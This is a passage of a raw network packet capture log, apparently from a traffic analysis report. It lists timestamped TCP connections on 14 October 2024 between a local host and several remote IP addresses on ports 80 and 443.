                                            Oct 14, 2024 09:12:10.350982904 CEST44349737142.250.185.97192.168.2.4
                                            Oct 14, 2024 09:12:10.351032972 CEST49737443192.168.2.4142.250.185.97
                                            Oct 14, 2024 09:12:10.351073027 CEST44349737142.250.185.97192.168.2.4
                                            Oct 14, 2024 09:12:10.351119041 CEST49737443192.168.2.4142.250.185.97
                                            Oct 14, 2024 09:12:10.351159096 CEST44349737142.250.185.97192.168.2.4
                                            Oct 14, 2024 09:12:10.351210117 CEST49737443192.168.2.4142.250.185.97
                                            Oct 14, 2024 09:12:10.351248026 CEST44349737142.250.185.97192.168.2.4
                                            Oct 14, 2024 09:12:10.351294041 CEST49737443192.168.2.4142.250.185.97
                                            Oct 14, 2024 09:12:10.351330996 CEST44349737142.250.185.97192.168.2.4
                                            Oct 14, 2024 09:12:10.351388931 CEST49737443192.168.2.4142.250.185.97
                                            Oct 14, 2024 09:12:10.351901054 CEST44349737142.250.185.97192.168.2.4
                                            Oct 14, 2024 09:12:10.351959944 CEST49737443192.168.2.4142.250.185.97
                                            Oct 14, 2024 09:12:10.352060080 CEST44349737142.250.185.97192.168.2.4
                                            Oct 14, 2024 09:12:10.352113962 CEST49737443192.168.2.4142.250.185.97
                                            Oct 14, 2024 09:12:10.352252960 CEST44349737142.250.185.97192.168.2.4
                                            Oct 14, 2024 09:12:10.352300882 CEST49737443192.168.2.4142.250.185.97
                                            Oct 14, 2024 09:12:10.352339983 CEST44349737142.250.185.97192.168.2.4
                                            Oct 14, 2024 09:12:10.352385044 CEST49737443192.168.2.4142.250.185.97
                                            Oct 14, 2024 09:12:10.352421999 CEST44349737142.250.185.97192.168.2.4
                                            Oct 14, 2024 09:12:10.352471113 CEST49737443192.168.2.4142.250.185.97
                                            Oct 14, 2024 09:12:10.353755951 CEST44349737142.250.185.97192.168.2.4
                                            Oct 14, 2024 09:12:10.353804111 CEST49737443192.168.2.4142.250.185.97
                                            Oct 14, 2024 09:12:10.353864908 CEST44349737142.250.185.97192.168.2.4
                                            Oct 14, 2024 09:12:10.353907108 CEST49737443192.168.2.4142.250.185.97
                                            Oct 14, 2024 09:12:10.353945971 CEST44349737142.250.185.97192.168.2.4
                                            Oct 14, 2024 09:12:10.353998899 CEST49737443192.168.2.4142.250.185.97
                                            Oct 14, 2024 09:12:10.355402946 CEST44349737142.250.185.97192.168.2.4
                                            Oct 14, 2024 09:12:10.355467081 CEST49737443192.168.2.4142.250.185.97
                                            Oct 14, 2024 09:12:10.359138012 CEST44349737142.250.185.97192.168.2.4
                                            Oct 14, 2024 09:12:10.359194994 CEST49737443192.168.2.4142.250.185.97
                                            Oct 14, 2024 09:12:10.359241962 CEST44349737142.250.185.97192.168.2.4
                                            Oct 14, 2024 09:12:10.359297037 CEST49737443192.168.2.4142.250.185.97
                                            Oct 14, 2024 09:12:10.359328032 CEST44349737142.250.185.97192.168.2.4
                                            Oct 14, 2024 09:12:10.359376907 CEST49737443192.168.2.4142.250.185.97
                                            Oct 14, 2024 09:12:10.359430075 CEST44349737142.250.185.97192.168.2.4
                                            Oct 14, 2024 09:12:10.359479904 CEST49737443192.168.2.4142.250.185.97
                                            Oct 14, 2024 09:12:10.363959074 CEST44349737142.250.185.97192.168.2.4
                                            Oct 14, 2024 09:12:10.364012003 CEST49737443192.168.2.4142.250.185.97
                                            Oct 14, 2024 09:12:10.364051104 CEST44349737142.250.185.97192.168.2.4
                                            Oct 14, 2024 09:12:10.364109993 CEST49737443192.168.2.4142.250.185.97
                                            Oct 14, 2024 09:12:10.364151955 CEST44349737142.250.185.97192.168.2.4
                                            Oct 14, 2024 09:12:10.364198923 CEST49737443192.168.2.4142.250.185.97
                                            Oct 14, 2024 09:12:10.364228010 CEST44349737142.250.185.97192.168.2.4
                                            Oct 14, 2024 09:12:10.364278078 CEST49737443192.168.2.4142.250.185.97
                                            Oct 14, 2024 09:12:10.368504047 CEST44349737142.250.185.97192.168.2.4
                                            Oct 14, 2024 09:12:10.368567944 CEST49737443192.168.2.4142.250.185.97
                                            Oct 14, 2024 09:12:10.368593931 CEST44349737142.250.185.97192.168.2.4
                                            Oct 14, 2024 09:12:10.368642092 CEST49737443192.168.2.4142.250.185.97
                                            Oct 14, 2024 09:12:10.368676901 CEST44349737142.250.185.97192.168.2.4
                                            Oct 14, 2024 09:12:10.368736029 CEST49737443192.168.2.4142.250.185.97
                                            Oct 14, 2024 09:12:10.370534897 CEST44349737142.250.185.97192.168.2.4
                                            Oct 14, 2024 09:12:10.370601892 CEST49737443192.168.2.4142.250.185.97
                                            Oct 14, 2024 09:12:10.373130083 CEST44349737142.250.185.97192.168.2.4
                                            Oct 14, 2024 09:12:10.373184919 CEST49737443192.168.2.4142.250.185.97
                                            Oct 14, 2024 09:12:10.373220921 CEST44349737142.250.185.97192.168.2.4
                                            Oct 14, 2024 09:12:10.373266935 CEST49737443192.168.2.4142.250.185.97
                                            Oct 14, 2024 09:12:10.373308897 CEST44349737142.250.185.97192.168.2.4
                                            Oct 14, 2024 09:12:10.373353958 CEST49737443192.168.2.4142.250.185.97
                                            Oct 14, 2024 09:12:10.373394966 CEST44349737142.250.185.97192.168.2.4
                                            Oct 14, 2024 09:12:10.373439074 CEST49737443192.168.2.4142.250.185.97
                                            Oct 14, 2024 09:12:10.373477936 CEST44349737142.250.185.97192.168.2.4
                                            Oct 14, 2024 09:12:10.373529911 CEST49737443192.168.2.4142.250.185.97
                                            Oct 14, 2024 09:12:10.378072023 CEST44349737142.250.185.97192.168.2.4
                                            Oct 14, 2024 09:12:10.378129959 CEST49737443192.168.2.4142.250.185.97
                                            Oct 14, 2024 09:12:10.378158092 CEST44349737142.250.185.97192.168.2.4
                                            Oct 14, 2024 09:12:10.378213882 CEST49737443192.168.2.4142.250.185.97
                                            Oct 14, 2024 09:12:10.378442049 CEST44349737142.250.185.97192.168.2.4
                                            Oct 14, 2024 09:12:10.378494024 CEST49737443192.168.2.4142.250.185.97
                                            Oct 14, 2024 09:12:10.378525019 CEST44349737142.250.185.97192.168.2.4
                                            Oct 14, 2024 09:12:10.378577948 CEST49737443192.168.2.4142.250.185.97
                                            Oct 14, 2024 09:12:10.382710934 CEST44349737142.250.185.97192.168.2.4
                                            Oct 14, 2024 09:12:10.382764101 CEST49737443192.168.2.4142.250.185.97
                                            Oct 14, 2024 09:12:10.382797956 CEST44349737142.250.185.97192.168.2.4
                                            Oct 14, 2024 09:12:10.382853985 CEST49737443192.168.2.4142.250.185.97
                                            Oct 14, 2024 09:12:10.382889032 CEST44349737142.250.185.97192.168.2.4
                                            Oct 14, 2024 09:12:10.382945061 CEST49737443192.168.2.4142.250.185.97
                                            Oct 14, 2024 09:12:10.382986069 CEST44349737142.250.185.97192.168.2.4
                                            Oct 14, 2024 09:12:10.383033991 CEST49737443192.168.2.4142.250.185.97
                                            Oct 14, 2024 09:12:10.387101889 CEST44349737142.250.185.97192.168.2.4
                                            Oct 14, 2024 09:12:10.387152910 CEST49737443192.168.2.4142.250.185.97
                                            Oct 14, 2024 09:12:10.387208939 CEST44349737142.250.185.97192.168.2.4
                                            Oct 14, 2024 09:12:10.387255907 CEST49737443192.168.2.4142.250.185.97
                                            Oct 14, 2024 09:12:10.387298107 CEST44349737142.250.185.97192.168.2.4
                                            Oct 14, 2024 09:12:10.387342930 CEST49737443192.168.2.4142.250.185.97
                                            Oct 14, 2024 09:12:10.387401104 CEST44349737142.250.185.97192.168.2.4
                                            Oct 14, 2024 09:12:10.387443066 CEST49737443192.168.2.4142.250.185.97
                                            Oct 14, 2024 09:12:10.391602039 CEST44349737142.250.185.97192.168.2.4
                                            Oct 14, 2024 09:12:10.391665936 CEST49737443192.168.2.4142.250.185.97
                                            Oct 14, 2024 09:12:10.391674995 CEST44349737142.250.185.97192.168.2.4
                                            Oct 14, 2024 09:12:10.391720057 CEST49737443192.168.2.4142.250.185.97
                                            Oct 14, 2024 09:12:10.391733885 CEST44349737142.250.185.97192.168.2.4
                                            Oct 14, 2024 09:12:10.391774893 CEST49737443192.168.2.4142.250.185.97
                                            Oct 14, 2024 09:12:10.391782045 CEST44349737142.250.185.97192.168.2.4
                                            Oct 14, 2024 09:12:10.391827106 CEST49737443192.168.2.4142.250.185.97
                                            Oct 14, 2024 09:12:10.396158934 CEST44349737142.250.185.97192.168.2.4
                                            Oct 14, 2024 09:12:10.396209955 CEST44349737142.250.185.97192.168.2.4
                                            Oct 14, 2024 09:12:10.396229982 CEST49737443192.168.2.4142.250.185.97
                                            Oct 14, 2024 09:12:10.396239042 CEST44349737142.250.185.97192.168.2.4
                                            Oct 14, 2024 09:12:10.396256924 CEST49737443192.168.2.4142.250.185.97
                                            Oct 14, 2024 09:12:10.396301031 CEST49737443192.168.2.4142.250.185.97
                                            Oct 14, 2024 09:12:10.396306038 CEST44349737142.250.185.97192.168.2.4
                                            Oct 14, 2024 09:12:10.396351099 CEST49737443192.168.2.4142.250.185.97
                                            Oct 14, 2024 09:12:10.400645018 CEST44349737142.250.185.97192.168.2.4
                                            Oct 14, 2024 09:12:10.400688887 CEST49737443192.168.2.4142.250.185.97
                                            Oct 14, 2024 09:12:10.400697947 CEST44349737142.250.185.97192.168.2.4
                                            Oct 14, 2024 09:12:10.400746107 CEST49737443192.168.2.4142.250.185.97
                                            Oct 14, 2024 09:12:10.400753021 CEST44349737142.250.185.97192.168.2.4
                                            Oct 14, 2024 09:12:10.400790930 CEST44349737142.250.185.97192.168.2.4
                                            Oct 14, 2024 09:12:10.400791883 CEST49737443192.168.2.4142.250.185.97
                                            Oct 14, 2024 09:12:10.400803089 CEST44349737142.250.185.97192.168.2.4
                                            Oct 14, 2024 09:12:10.400830984 CEST49737443192.168.2.4142.250.185.97
                                            Oct 14, 2024 09:12:10.400876045 CEST49737443192.168.2.4142.250.185.97
                                            Oct 14, 2024 09:12:10.404383898 CEST44349737142.250.185.97192.168.2.4
                                            Oct 14, 2024 09:12:10.404447079 CEST44349737142.250.185.97192.168.2.4
                                            Oct 14, 2024 09:12:10.404449940 CEST49737443192.168.2.4142.250.185.97
                                            Oct 14, 2024 09:12:10.404457092 CEST44349737142.250.185.97192.168.2.4
                                            Oct 14, 2024 09:12:10.404499054 CEST49737443192.168.2.4142.250.185.97
                                            Oct 14, 2024 09:12:10.405704975 CEST44349737142.250.185.97192.168.2.4
                                            Oct 14, 2024 09:12:10.405759096 CEST49737443192.168.2.4142.250.185.97
                                            Oct 14, 2024 09:12:10.408229113 CEST44349737142.250.185.97192.168.2.4
                                            Oct 14, 2024 09:12:10.408272982 CEST44349737142.250.185.97192.168.2.4
                                            Oct 14, 2024 09:12:10.408299923 CEST49737443192.168.2.4142.250.185.97
                                            Oct 14, 2024 09:12:10.408308983 CEST44349737142.250.185.97192.168.2.4
                                            Oct 14, 2024 09:12:10.408323050 CEST49737443192.168.2.4142.250.185.97
                                            Oct 14, 2024 09:12:10.408365011 CEST49737443192.168.2.4142.250.185.97
                                            Oct 14, 2024 09:12:10.409349918 CEST44349737142.250.185.97192.168.2.4
                                            Oct 14, 2024 09:12:10.409414053 CEST49737443192.168.2.4142.250.185.97
                                            Oct 14, 2024 09:12:10.412110090 CEST44349737142.250.185.97192.168.2.4
                                            Oct 14, 2024 09:12:10.412178040 CEST49737443192.168.2.4142.250.185.97
                                            Oct 14, 2024 09:12:10.412194014 CEST44349737142.250.185.97192.168.2.4
                                            Oct 14, 2024 09:12:10.412240982 CEST49737443192.168.2.4142.250.185.97
                                            Oct 14, 2024 09:12:10.412276030 CEST44349737142.250.185.97192.168.2.4
                                            Oct 14, 2024 09:12:10.412328005 CEST49737443192.168.2.4142.250.185.97
                                            Oct 14, 2024 09:12:10.413110018 CEST44349737142.250.185.97192.168.2.4
                                            Oct 14, 2024 09:12:10.413162947 CEST49737443192.168.2.4142.250.185.97
                                            Oct 14, 2024 09:12:10.416081905 CEST44349737142.250.185.97192.168.2.4
                                            Oct 14, 2024 09:12:10.416145086 CEST49737443192.168.2.4142.250.185.97
                                            Oct 14, 2024 09:12:10.416176081 CEST44349737142.250.185.97192.168.2.4
                                            Oct 14, 2024 09:12:10.416222095 CEST49737443192.168.2.4142.250.185.97
                                            Oct 14, 2024 09:12:10.416260004 CEST44349737142.250.185.97192.168.2.4
                                            Oct 14, 2024 09:12:10.416306973 CEST49737443192.168.2.4142.250.185.97
                                            Oct 14, 2024 09:12:10.416702032 CEST44349737142.250.185.97192.168.2.4
                                            Oct 14, 2024 09:12:10.416748047 CEST49737443192.168.2.4142.250.185.97
                                            Oct 14, 2024 09:12:10.419799089 CEST44349737142.250.185.97192.168.2.4
                                            Oct 14, 2024 09:12:10.419862032 CEST49737443192.168.2.4142.250.185.97
                                            Oct 14, 2024 09:12:10.419895887 CEST44349737142.250.185.97192.168.2.4
                                            Oct 14, 2024 09:12:10.419939995 CEST49737443192.168.2.4142.250.185.97
                                            Oct 14, 2024 09:12:10.419991970 CEST44349737142.250.185.97192.168.2.4
                                            Oct 14, 2024 09:12:10.420042992 CEST49737443192.168.2.4142.250.185.97
                                            Oct 14, 2024 09:12:10.420075893 CEST44349737142.250.185.97192.168.2.4
                                            Oct 14, 2024 09:12:10.420130968 CEST49737443192.168.2.4142.250.185.97
                                            Oct 14, 2024 09:12:10.423046112 CEST44349737142.250.185.97192.168.2.4
                                            Oct 14, 2024 09:12:10.423095942 CEST49737443192.168.2.4142.250.185.97
                                            Oct 14, 2024 09:12:10.423158884 CEST44349737142.250.185.97192.168.2.4
                                            Oct 14, 2024 09:12:10.423211098 CEST49737443192.168.2.4142.250.185.97
                                            Oct 14, 2024 09:12:10.423240900 CEST44349737142.250.185.97192.168.2.4
                                            Oct 14, 2024 09:12:10.423290968 CEST49737443192.168.2.4142.250.185.97
                                            Oct 14, 2024 09:12:10.424489975 CEST44349737142.250.185.97192.168.2.4
                                            Oct 14, 2024 09:12:10.424541950 CEST49737443192.168.2.4142.250.185.97
                                            Oct 14, 2024 09:12:10.426701069 CEST44349737142.250.185.97192.168.2.4
                                            Oct 14, 2024 09:12:10.426753044 CEST49737443192.168.2.4142.250.185.97
                                            Oct 14, 2024 09:12:10.426789999 CEST44349737142.250.185.97192.168.2.4
                                            Oct 14, 2024 09:12:10.426841974 CEST49737443192.168.2.4142.250.185.97
                                            Oct 14, 2024 09:12:10.445265055 CEST44349737142.250.185.97192.168.2.4
                                            Oct 14, 2024 09:12:10.445395947 CEST49737443192.168.2.4142.250.185.97
                                            Oct 14, 2024 09:12:10.445404053 CEST44349737142.250.185.97192.168.2.4
                                            Oct 14, 2024 09:12:10.445452929 CEST49737443192.168.2.4142.250.185.97
                                            Oct 14, 2024 09:12:10.445462942 CEST44349737142.250.185.97192.168.2.4
                                            Oct 14, 2024 09:12:10.445501089 CEST49737443192.168.2.4142.250.185.97
                                            Oct 14, 2024 09:12:10.445514917 CEST44349737142.250.185.97192.168.2.4
                                            Oct 14, 2024 09:12:10.445559025 CEST49737443192.168.2.4142.250.185.97
                                            Oct 14, 2024 09:12:10.445631027 CEST44349737142.250.185.97192.168.2.4
                                            Oct 14, 2024 09:12:10.445681095 CEST49737443192.168.2.4142.250.185.97
                                            Oct 14, 2024 09:12:10.445719004 CEST44349737142.250.185.97192.168.2.4
                                            Oct 14, 2024 09:12:10.445763111 CEST49737443192.168.2.4142.250.185.97
                                            Oct 14, 2024 09:12:10.445806980 CEST44349737142.250.185.97192.168.2.4
                                            Oct 14, 2024 09:12:10.445853949 CEST49737443192.168.2.4142.250.185.97
                                            Oct 14, 2024 09:12:10.445897102 CEST44349737142.250.185.97192.168.2.4
                                            Oct 14, 2024 09:12:10.445941925 CEST49737443192.168.2.4142.250.185.97
                                            Oct 14, 2024 09:12:10.445985079 CEST44349737142.250.185.97192.168.2.4
                                            Oct 14, 2024 09:12:10.446032047 CEST49737443192.168.2.4142.250.185.97
                                            Oct 14, 2024 09:12:10.446074009 CEST44349737142.250.185.97192.168.2.4
                                            Oct 14, 2024 09:12:10.446121931 CEST49737443192.168.2.4142.250.185.97
                                            Oct 14, 2024 09:12:10.446165085 CEST44349737142.250.185.97192.168.2.4
                                            Oct 14, 2024 09:12:10.446209908 CEST49737443192.168.2.4142.250.185.97
                                            Oct 14, 2024 09:12:10.446253061 CEST44349737142.250.185.97192.168.2.4
                                            Oct 14, 2024 09:12:10.446299076 CEST49737443192.168.2.4142.250.185.97
                                            Oct 14, 2024 09:12:10.446337938 CEST44349737142.250.185.97192.168.2.4
                                            Oct 14, 2024 09:12:10.446397066 CEST49737443192.168.2.4142.250.185.97
                                            Oct 14, 2024 09:12:10.446611881 CEST44349737142.250.185.97192.168.2.4
                                            Oct 14, 2024 09:12:10.446666002 CEST49737443192.168.2.4142.250.185.97
                                            Oct 14, 2024 09:12:10.446697950 CEST44349737142.250.185.97192.168.2.4
                                            Oct 14, 2024 09:12:10.446743965 CEST49737443192.168.2.4142.250.185.97
                                            Oct 14, 2024 09:12:10.446785927 CEST44349737142.250.185.97192.168.2.4
                                            Oct 14, 2024 09:12:10.446837902 CEST49737443192.168.2.4142.250.185.97
                                            Oct 14, 2024 09:12:10.446877003 CEST44349737142.250.185.97192.168.2.4
                                            Oct 14, 2024 09:12:10.446924925 CEST49737443192.168.2.4142.250.185.97
                                            Oct 14, 2024 09:12:10.446959972 CEST44349737142.250.185.97192.168.2.4
                                            Oct 14, 2024 09:12:10.447005987 CEST49737443192.168.2.4142.250.185.97
                                            Oct 14, 2024 09:12:10.447041035 CEST44349737142.250.185.97192.168.2.4
                                            Oct 14, 2024 09:12:10.447094917 CEST49737443192.168.2.4142.250.185.97
                                            Oct 14, 2024 09:12:10.447449923 CEST44349737142.250.185.97192.168.2.4
                                            Oct 14, 2024 09:12:10.447499037 CEST49737443192.168.2.4142.250.185.97
                                            Oct 14, 2024 09:12:10.447532892 CEST44349737142.250.185.97192.168.2.4
                                            Oct 14, 2024 09:12:10.447576046 CEST49737443192.168.2.4142.250.185.97
                                            Oct 14, 2024 09:12:10.447623014 CEST44349737142.250.185.97192.168.2.4
                                            Oct 14, 2024 09:12:10.447671890 CEST49737443192.168.2.4142.250.185.97
                                            Oct 14, 2024 09:12:10.447705984 CEST44349737142.250.185.97192.168.2.4
                                            Oct 14, 2024 09:12:10.447751999 CEST49737443192.168.2.4142.250.185.97
                                            Oct 14, 2024 09:12:10.447793007 CEST44349737142.250.185.97192.168.2.4
                                            Oct 14, 2024 09:12:10.447846889 CEST49737443192.168.2.4142.250.185.97
                                            Oct 14, 2024 09:12:10.447880983 CEST44349737142.250.185.97192.168.2.4
                                            Oct 14, 2024 09:12:10.447931051 CEST49737443192.168.2.4142.250.185.97
                                            Oct 14, 2024 09:12:10.448242903 CEST44349737142.250.185.97192.168.2.4
                                            Oct 14, 2024 09:12:10.448297977 CEST49737443192.168.2.4142.250.185.97
                                            Oct 14, 2024 09:12:10.448415041 CEST44349737142.250.185.97192.168.2.4
                                            Oct 14, 2024 09:12:10.448463917 CEST49737443192.168.2.4142.250.185.97
                                            Oct 14, 2024 09:12:10.448493958 CEST44349737142.250.185.97192.168.2.4
                                            Oct 14, 2024 09:12:10.448543072 CEST49737443192.168.2.4142.250.185.97
                                            Oct 14, 2024 09:12:10.453295946 CEST44349737142.250.185.97192.168.2.4
                                            Oct 14, 2024 09:12:10.453356981 CEST49737443192.168.2.4142.250.185.97
                                            Oct 14, 2024 09:12:10.453383923 CEST44349737142.250.185.97192.168.2.4
                                            Oct 14, 2024 09:12:10.453455925 CEST49737443192.168.2.4142.250.185.97
                                            Oct 14, 2024 09:12:10.453469038 CEST44349737142.250.185.97192.168.2.4
                                            Oct 14, 2024 09:12:10.453520060 CEST49737443192.168.2.4142.250.185.97
                                            Oct 14, 2024 09:12:10.453560114 CEST44349737142.250.185.97192.168.2.4
                                            Oct 14, 2024 09:12:10.453610897 CEST49737443192.168.2.4142.250.185.97
                                            Oct 14, 2024 09:12:10.453649998 CEST44349737142.250.185.97192.168.2.4
                                            Oct 14, 2024 09:12:10.453701019 CEST49737443192.168.2.4142.250.185.97
                                            Oct 14, 2024 09:12:10.453726053 CEST44349737142.250.185.97192.168.2.4
                                            Oct 14, 2024 09:12:10.453779936 CEST49737443192.168.2.4142.250.185.97
                                            Oct 14, 2024 09:12:10.458630085 CEST44349737142.250.185.97192.168.2.4
                                            Oct 14, 2024 09:12:10.458718061 CEST49737443192.168.2.4142.250.185.97
                                            Oct 14, 2024 09:12:10.458729982 CEST44349737142.250.185.97192.168.2.4
                                            Oct 14, 2024 09:12:10.458782911 CEST49737443192.168.2.4142.250.185.97
                                            Oct 14, 2024 09:12:10.458795071 CEST44349737142.250.185.97192.168.2.4
                                            Oct 14, 2024 09:12:10.458842993 CEST49737443192.168.2.4142.250.185.97
                                            Oct 14, 2024 09:12:10.458883047 CEST44349737142.250.185.97192.168.2.4
                                            Oct 14, 2024 09:12:10.458930969 CEST49737443192.168.2.4142.250.185.97
                                            Oct 14, 2024 09:12:10.459026098 CEST44349737142.250.185.97192.168.2.4
                                            Oct 14, 2024 09:12:10.459076881 CEST49737443192.168.2.4142.250.185.97
                                            Oct 14, 2024 09:12:10.459104061 CEST49737443192.168.2.4142.250.185.97
                                            Oct 14, 2024 09:12:10.459114075 CEST44349737142.250.185.97192.168.2.4
                                            Oct 14, 2024 09:12:10.459167004 CEST49737443192.168.2.4142.250.185.97
                                            Oct 14, 2024 09:12:10.970212936 CEST4974480192.168.2.4193.122.130.0
                                            Oct 14, 2024 09:12:10.975205898 CEST8049744193.122.130.0192.168.2.4
                                            Oct 14, 2024 09:12:10.978260040 CEST4974480192.168.2.4193.122.130.0
                                            Oct 14, 2024 09:12:10.978410959 CEST4974480192.168.2.4193.122.130.0
                                            Oct 14, 2024 09:12:10.983273029 CEST8049744193.122.130.0192.168.2.4
                                            Oct 14, 2024 09:12:11.444911003 CEST8049744193.122.130.0192.168.2.4
                                            Oct 14, 2024 09:12:11.449043036 CEST4974480192.168.2.4193.122.130.0
                                            Oct 14, 2024 09:12:11.454850912 CEST8049744193.122.130.0192.168.2.4
                                            Oct 14, 2024 09:12:11.559118032 CEST8049744193.122.130.0192.168.2.4
                                            Oct 14, 2024 09:12:11.601627111 CEST4974480192.168.2.4193.122.130.0
                                            Oct 14, 2024 09:12:11.993009090 CEST49750443192.168.2.4188.114.96.3
                                            Oct 14, 2024 09:12:11.993045092 CEST44349750188.114.96.3192.168.2.4
                                            Oct 14, 2024 09:12:11.993122101 CEST49750443192.168.2.4188.114.96.3
                                            Oct 14, 2024 09:12:11.995026112 CEST49750443192.168.2.4188.114.96.3
                                            Oct 14, 2024 09:12:11.995040894 CEST44349750188.114.96.3192.168.2.4
                                            Oct 14, 2024 09:12:12.468008995 CEST44349750188.114.96.3192.168.2.4
                                            Oct 14, 2024 09:12:12.468110085 CEST49750443192.168.2.4188.114.96.3
                                            Oct 14, 2024 09:12:12.522118092 CEST49750443192.168.2.4188.114.96.3
                                            Oct 14, 2024 09:12:12.522142887 CEST44349750188.114.96.3192.168.2.4
                                            Oct 14, 2024 09:12:12.523255110 CEST44349750188.114.96.3192.168.2.4
                                            Oct 14, 2024 09:12:12.570384026 CEST49750443192.168.2.4188.114.96.3
                                            Oct 14, 2024 09:12:12.587961912 CEST49750443192.168.2.4188.114.96.3
                                            Oct 14, 2024 09:12:12.635445118 CEST44349750188.114.96.3192.168.2.4
                                            Oct 14, 2024 09:12:12.695858002 CEST44349750188.114.96.3192.168.2.4
                                            Oct 14, 2024 09:12:12.695939064 CEST44349750188.114.96.3192.168.2.4
                                            Oct 14, 2024 09:12:12.696199894 CEST49750443192.168.2.4188.114.96.3
                                            Oct 14, 2024 09:12:12.759989023 CEST49750443192.168.2.4188.114.96.3
                                            Oct 14, 2024 09:12:12.768369913 CEST4974480192.168.2.4193.122.130.0
                                            Oct 14, 2024 09:12:12.773870945 CEST8049744193.122.130.0192.168.2.4
                                            Oct 14, 2024 09:12:12.878074884 CEST8049744193.122.130.0192.168.2.4
                                            Oct 14, 2024 09:12:12.882086039 CEST49756443192.168.2.4188.114.96.3
                                            Oct 14, 2024 09:12:12.882126093 CEST44349756188.114.96.3192.168.2.4
                                            Oct 14, 2024 09:12:12.882205963 CEST49756443192.168.2.4188.114.96.3
                                            Oct 14, 2024 09:12:12.882486105 CEST49756443192.168.2.4188.114.96.3
                                            Oct 14, 2024 09:12:12.882503033 CEST44349756188.114.96.3192.168.2.4
                                            Oct 14, 2024 09:12:12.929761887 CEST4974480192.168.2.4193.122.130.0
                                            Oct 14, 2024 09:12:13.357738972 CEST44349756188.114.96.3192.168.2.4
                                            Oct 14, 2024 09:12:13.359451056 CEST49756443192.168.2.4188.114.96.3
                                            Oct 14, 2024 09:12:13.359479904 CEST44349756188.114.96.3192.168.2.4
                                            Oct 14, 2024 09:12:13.508976936 CEST44349756188.114.96.3192.168.2.4
                                            Oct 14, 2024 09:12:13.509216070 CEST44349756188.114.96.3192.168.2.4
                                            Oct 14, 2024 09:12:13.509342909 CEST49756443192.168.2.4188.114.96.3
                                            Oct 14, 2024 09:12:13.509639025 CEST49756443192.168.2.4188.114.96.3
                                            Oct 14, 2024 09:12:13.512748003 CEST4974480192.168.2.4193.122.130.0
                                            Oct 14, 2024 09:12:13.513854027 CEST4976280192.168.2.4193.122.130.0
                                            Oct 14, 2024 09:12:13.518013000 CEST8049744193.122.130.0192.168.2.4
                                            Oct 14, 2024 09:12:13.518083096 CEST4974480192.168.2.4193.122.130.0
                                            Oct 14, 2024 09:12:13.518655062 CEST8049762193.122.130.0192.168.2.4
                                            Oct 14, 2024 09:12:13.518728018 CEST4976280192.168.2.4193.122.130.0
                                            Oct 14, 2024 09:12:13.518816948 CEST4976280192.168.2.4193.122.130.0
                                            Oct 14, 2024 09:12:13.523611069 CEST8049762193.122.130.0192.168.2.4
                                            Oct 14, 2024 09:12:14.017910004 CEST8049762193.122.130.0192.168.2.4
                                            Oct 14, 2024 09:12:14.019112110 CEST49768443192.168.2.4188.114.96.3
                                            Oct 14, 2024 09:12:14.019129038 CEST44349768188.114.96.3192.168.2.4
                                            Oct 14, 2024 09:12:14.019196033 CEST49768443192.168.2.4188.114.96.3
                                            Oct 14, 2024 09:12:14.019403934 CEST49768443192.168.2.4188.114.96.3
                                            Oct 14, 2024 09:12:14.019412041 CEST44349768188.114.96.3192.168.2.4
                                            Oct 14, 2024 09:12:14.070379972 CEST4976280192.168.2.4193.122.130.0
                                            Oct 14, 2024 09:12:14.495891094 CEST44349768188.114.96.3192.168.2.4
                                            Oct 14, 2024 09:12:14.497700930 CEST49768443192.168.2.4188.114.96.3
                                            Oct 14, 2024 09:12:14.497744083 CEST44349768188.114.96.3192.168.2.4
                                            Oct 14, 2024 09:12:14.647413969 CEST44349768188.114.96.3192.168.2.4
                                            Oct 14, 2024 09:12:14.647536039 CEST44349768188.114.96.3192.168.2.4
                                            Oct 14, 2024 09:12:14.647614002 CEST49768443192.168.2.4188.114.96.3
                                            Oct 14, 2024 09:12:14.648058891 CEST49768443192.168.2.4188.114.96.3
                                            Oct 14, 2024 09:12:14.652259111 CEST4977080192.168.2.4193.122.130.0
                                            Oct 14, 2024 09:12:14.657108068 CEST8049770193.122.130.0192.168.2.4
                                            Oct 14, 2024 09:12:14.657234907 CEST4977080192.168.2.4193.122.130.0
                                            Oct 14, 2024 09:12:14.657296896 CEST4977080192.168.2.4193.122.130.0
                                            Oct 14, 2024 09:12:14.662147999 CEST8049770193.122.130.0192.168.2.4
                                            Oct 14, 2024 09:12:15.151238918 CEST8049770193.122.130.0192.168.2.4
                                            Oct 14, 2024 09:12:15.152559042 CEST49775443192.168.2.4188.114.96.3
                                            Oct 14, 2024 09:12:15.152585983 CEST44349775188.114.96.3192.168.2.4
                                            Oct 14, 2024 09:12:15.152645111 CEST49775443192.168.2.4188.114.96.3
                                            Oct 14, 2024 09:12:15.152879000 CEST49775443192.168.2.4188.114.96.3
                                            Oct 14, 2024 09:12:15.152892113 CEST44349775188.114.96.3192.168.2.4
                                            Oct 14, 2024 09:12:15.195425034 CEST4977080192.168.2.4193.122.130.0
                                            Oct 14, 2024 09:12:15.650916100 CEST44349775188.114.96.3192.168.2.4
                                            Oct 14, 2024 09:12:15.652482033 CEST49775443192.168.2.4188.114.96.3
                                            Oct 14, 2024 09:12:15.652517080 CEST44349775188.114.96.3192.168.2.4
                                            Oct 14, 2024 09:12:15.772799969 CEST44349775188.114.96.3192.168.2.4
                                            Oct 14, 2024 09:12:15.773067951 CEST44349775188.114.96.3192.168.2.4
                                            Oct 14, 2024 09:12:15.773154974 CEST49775443192.168.2.4188.114.96.3
                                            Oct 14, 2024 09:12:15.773439884 CEST49775443192.168.2.4188.114.96.3
                                            Oct 14, 2024 09:12:15.776731968 CEST4977080192.168.2.4193.122.130.0
                                            Oct 14, 2024 09:12:15.777647972 CEST4978180192.168.2.4193.122.130.0
                                            Oct 14, 2024 09:12:15.784224033 CEST8049781193.122.130.0192.168.2.4
                                            Oct 14, 2024 09:12:15.784252882 CEST8049770193.122.130.0192.168.2.4
                                            Oct 14, 2024 09:12:15.784342051 CEST4977080192.168.2.4193.122.130.0
                                            Oct 14, 2024 09:12:15.784359932 CEST4978180192.168.2.4193.122.130.0
                                            Oct 14, 2024 09:12:15.784436941 CEST4978180192.168.2.4193.122.130.0
                                            Oct 14, 2024 09:12:15.790250063 CEST8049781193.122.130.0192.168.2.4
                                            Oct 14, 2024 09:12:16.258533001 CEST8049781193.122.130.0192.168.2.4
                                            Oct 14, 2024 09:12:16.260337114 CEST49783443192.168.2.4188.114.96.3
                                            Oct 14, 2024 09:12:16.260377884 CEST44349783188.114.96.3192.168.2.4
                                            Oct 14, 2024 09:12:16.260448933 CEST49783443192.168.2.4188.114.96.3
